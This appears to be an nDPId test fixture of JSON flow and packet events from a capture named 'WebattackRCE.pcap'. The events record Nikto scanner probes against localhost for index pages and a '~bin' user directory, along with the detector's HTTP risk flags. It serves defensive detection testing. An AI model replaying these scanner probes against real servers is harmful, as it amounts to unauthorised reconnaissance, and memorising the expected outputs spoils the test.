00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":1,"flow_last_seen":1576420276820,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276820,"pkt":"AAAAAAAAAAAAAAAACABFAADG77xAAEAGTHN\/AAABfwAAAcJQH5DIa9eQqgE4nYAYAED+ugAAAQEICp1m+3ydZvt8R0VUIC9pbmRleC5hc3AgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptdWx0aXBsZV9pbmRleCkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276820,"flow_last_seen":1576420276820,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276820,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49744,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":102,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276821,"flow_last_seen":1576420276821,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276821,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49746,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":1,"flow_last_seen":1576420276821,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276821,"pkt":"AAAAAAAAAAAAAAAACABFAADHQ2dAAEAG+Md\/AAABfwAAAcJSH5BEZHtRsCeOn4AYAED+uwAAAQEICp1m+32dZvt9R0VUIC9pbmRleC5hc3B4IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptdWx0aXBsZV9pbmRleCkNCg0K"}
01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":102,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276821,"flow_last_seen":1576420276821,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276821,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49746,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.aspx","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":103,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276823,"flow_last_seen":1576420276823,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276823,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49748,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":1,"flow_last_seen":1576420276823,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276823,"pkt":"AAAAAAAAAAAAAAAACABFAADI9WNAAEAGRsp\/AAABfwAAAcJUH5Atl81VKdEVGoAYAED+vAAAAQEICp1m+3+dZvt\/R0VUIC9kZWZhdWx0LmFzcCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276823,"flow_last_seen":1576420276823,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276823,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49748,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/default.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":104,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276824,"flow_last_seen":1576420276824,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276824,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49750,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":1,"flow_last_seen":1576420276824,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420276824,"pkt":"AAAAAAAAAAAAAAAACABFAADJPphAAEAG\/ZR\/AAABfwAAAcJWH5C0BwahLC3FVoAYAED+vQAAAQEICp1m+4CdZvuAR0VUIC9kZWZhdWx0LmFzcHggSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KDQo="}
01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276824,"flow_last_seen":1576420276824,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276824,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49750,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/default.aspx","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":105,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276825,"flow_last_seen":1576420276825,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276825,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49752,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":1,"flow_last_seen":1576420276825,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276825,"pkt":"AAAAAAAAAAAAAAAACABFAADIFrxAAEAGJXJ\/AAABfwAAAcJYH5C2Ei6NIzroBYAYAED+vAAAAQEICp1m+4GdZvuBR0VUIC9kZWZhdWx0Lmh0bSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bXVsdGlwbGVfaW5kZXgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":105,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276825,"flow_last_seen":1576420276825,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276825,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49752,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/default.htm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":106,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276827,"flow_last_seen":1576420276827,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276827,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49754,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":1,"flow_last_seen":1576420276827,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276827,"pkt":"AAAAAAAAAAAAAAAACABFAADFTUVAAEAG7ut\/AAABfwAAAcJaH5CLBXV23SQCI4AYAED+uQAAAQEICp1m+4OdZvuDR0VUIC9pbmRleC5kbyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":106,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276827,"flow_last_seen":1576420276827,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276827,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49754,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.do","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":107,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276828,"flow_last_seen":1576420276828,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276828,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49756,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":1,"flow_last_seen":1576420276828,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276828,"pkt":"AAAAAAAAAAAAAAAACABFAADICi9AAEAGMf9\/AAABfwAAAcJcH5By6zIbQafp54AYAED+vAAAAQEICp1m+4SdZvuER0VUIC9pbmRleC5qaHRtbCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":107,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276828,"flow_last_seen":1576420276828,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276828,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49756,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.jhtml","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":108,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276829,"flow_last_seen":1576420276829,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276829,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49758,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":108,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":1,"flow_last_seen":1576420276829,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276829,"pkt":"AAAAAAAAAAAAAAAACABFAADG08RAAEAGaGt\/AAABfwAAAcJeH5AOKuv2Y8ch84AYAED+ugAAAQEICp1m+4WdZvuFR0VUIC9pbmRleC5qc3AgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KDQo="}
01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":108,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276829,"flow_last_seen":1576420276829,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276829,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49758,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.jsp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":109,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276832,"flow_last_seen":1576420276832,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276832,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49760,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":1,"flow_last_seen":1576420276832,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276832,"pkt":"AAAAAAAAAAAAAAAACABFAADGiDJAAEAGs\/1\/AAABfwAAAcJgH5Cj8LAJpHctpoAYAED+ugAAAQEICp1m+4edZvuHR0VUIC9pbmRleC54bWwgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276832,"flow_last_seen":1576420276832,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276832,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49760,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.xml","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":110,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276834,"flow_last_seen":1576420276834,"flow_idle_time":7580000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"midstream":1,"thread_ts_msec":1576420276834,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49764,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00709{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":110,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":1,"flow_last_seen":1576420276834,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":240,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":240,"pkt_l4_len":206,"thread_ts_msec":1576420276834,"pkt":"AAAAAAAAAAAAAAAACABFAADiGX1AAEAGIpd\/AAABfwAAAcJkH5BjVCFE0UHCd4AYAED+1gAAAQEICp1m+4qdZvuKR0VUIC9pbmRleCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om5lZ290aWF0ZSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdDogYXBwbGljYXRpb24vd2hhdGV2ZXI7IHE9MS4wDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":110,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276834,"flow_last_seen":1576420276834,"flow_idle_time":7580000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"midstream":1,"thread_ts_msec":1576420276834,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49764,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:negotiate)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":111,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276835,"flow_last_seen":1576420276835,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420276835,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49766,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":111,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":111,"flow_packet_id":1,"flow_last_seen":1576420276835,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420276835,"pkt":"AAAAAAAAAAAAAAAACABFAADKANNAAEAGO1l\/AAABfwAAAcJmH5BoODjpUSa4iYAYAED+vgAAAQEICp1m+4udZvuLR0VUIC9+YmluIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDphcGFjaGV1c2Vyczoga25vd24gdXNlcikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":111,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276835,"flow_last_seen":1576420276835,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420276835,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49766,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/~bin","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:apacheusers: known user)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":112,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276837,"flow_last_seen":1576420276837,"flow_idle_time":7580000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420276837,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49768,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
